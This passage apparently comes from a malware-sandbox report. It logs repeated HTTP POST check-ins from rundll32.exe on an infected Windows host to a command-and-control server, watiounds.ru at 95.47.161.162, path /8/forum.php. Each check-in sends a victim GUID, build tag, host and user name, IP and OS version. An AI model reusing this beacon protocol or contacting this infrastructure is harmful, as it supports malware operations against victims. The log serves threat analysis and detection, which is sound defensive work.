                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:06.576705933 CEST | 435 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:06 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 54 47 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHTGSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          358 | 192.168.2.22 | 49523 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:06.907912016 CEST | 436 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:07.036864042 CEST | 436 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 54 47 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYTGBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          359 | 192.168.2.22 | 49524 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:07.360558033 CEST | 437 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:07.490823030 CEST | 437 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZFUAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          36 | 192.168.2.22 | 49201 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:39.636934042 CEST | 75 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:39.766062975 CEST | 76 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:39 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cJAZQARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          360 | 192.168.2.22 | 49525 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:07.803448915 CEST | 438 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:07.926779985 CEST | 438 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:07 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 56 45 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFVEUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          361 | 192.168.2.22 | 49526 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:08.241230011 CEST | 439 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:08.362716913 CEST | 439 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFCXUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          362 | 192.168.2.22 | 49527 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:08.676376104 CEST | 440 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:08.798355103 CEST | 440 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:08 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          363 | 192.168.2.22 | 49528 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:09.125950098 CEST | 441 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:09.247762918 CEST | 442 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCGTXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          364 | 192.168.2.22 | 49529 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:09.569463015 CEST | 442 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:09.693094969 CEST | 443 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:09 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 54 47 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBTGYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          365 | 192.168.2.22 | 49530 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:10.003714085 CEST | 444 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:10.125227928 CEST | 444 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZBYAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          366 | 192.168.2.22 | 49531 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:10.442394018 CEST | 445 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:10.563672066 CEST | 445 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFKPUARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          367 | 192.168.2.22 | 49532 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:10.885448933 CEST | 446 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:11.014106989 CEST | 446 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:10 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 4e 4d 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTNMGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          368 | 192.168.2.22 | 49533 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:11.340051889 CEST | 447 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:11.469918013 CEST | 447 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNZAMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          369 | 192.168.2.22 | 49534 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:11.781888008 CEST | 448 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:11.907711983 CEST | 448 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:11 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVNMEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          37 | 192.168.2.22 | 49202 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:40.102360010 CEST | 76 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:40.231110096 CEST | 77 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 54 47 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKTGPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          370 | 192.168.2.22 | 49535 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:12.216630936 CEST | 449 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:12.340862989 CEST | 449 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 47 54 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYGTBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          371 | 192.168.2.22 | 49536 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:12.656728029 CEST | 450 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:12.782521963 CEST | 451 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:12 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 54 47 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTTGGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          372 | 192.168.2.22 | 49537 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:13.111071110 CEST | 451 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:13.241555929 CEST | 452 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4a 51 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCJQXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          373 | 192.168.2.22 | 49538 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:13.566484928 CEST | 452 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:13.690121889 CEST | 453 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:13 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 42 59 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNBYMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          374 | 192.168.2.22 | 49539 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:14.020216942 CEST | 454 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:24:14.143364906 CEST | 454 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:24:14 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 59 42 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVYBEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          375 | 192.168.2.22 | 49540 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:24:14.466567993 CEST | 455 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
